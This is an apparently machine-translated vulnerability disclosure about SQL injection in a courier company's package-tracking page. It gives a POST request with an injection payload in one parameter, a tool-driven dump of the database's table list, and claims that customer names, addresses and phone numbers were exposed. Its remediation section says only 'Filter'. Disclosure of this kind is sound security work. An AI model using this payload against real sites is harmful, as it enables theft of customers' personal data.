Equick International Express www main site injection (leakage of Express Information)
RT
Leakage: name, Waybill time, address, phone number, cargo and other express information
Main Site:
http://**.**.**.**/index.aspx
Vulnerability address:
Http ://**. **. **. **/pPackageTraceQuery. aspxPOST: __eventtarget = & __ EVENTARGUMENT = & __ VIEWSTATE = % login % 3D & __ EVENTVALIDATION = % login & left2 % 24 LoginType = 1 & left2 % 24 USERID = & left2 % 24 PASSWORD = & EQUICKEXPRESSID = a % 27and + 1 = user -- & ImageButton1.x = 40 & ImageButton1.y = 14 parameter: EQUICKEXPRESSID injecting
Directly planing with tools
Database information exposed
Data Table
Database: EquickOC_Home[45 tables]+----------------------------+| BookColaForm || BookingFormEOC || BookingFormEOCGoods || BookingFormEOCHistory || BookingFormEOCRecycleBin || BookingFormTrace || BookingFormTraceHistory || ClienteleInfo || ClienteleSelect || Company || Consumer || Country || Customer || DataDick || EBAYGOODLINK || EBAYKINDLINK || EBAYUSER || EC_ORDENOREPL || EC_SENDMAIL || EC_USERACCELOG || MenuBand || MultiHTML || MultiUnion || Nonce || PrePayment || PrePaymentMelt || Purview || Questions || QuestionsItems || QuickType || QuickTypeService || QuickTypeTrace || SequenceNo || TABLE_COUNTRY || TABLE_INSIDEMAILS || TABLE_MAILPACKAGE || TABLE_MAILPACKAGE_SENDINFO || TABLE_NEWS || TABLE_PAYTMP || TABLE_QUICKPAY || TABLE_SYSTEMDATA || TABLE_USERS || TABLE_WEIGHTPRICE || delme_table_news || dst2q |+----------------------------+
Data Volume
Data proof
Leakage: name, Waybill time, address, phone number, cargo and other express information
Proven, not in-depth
Solution:
Filter
.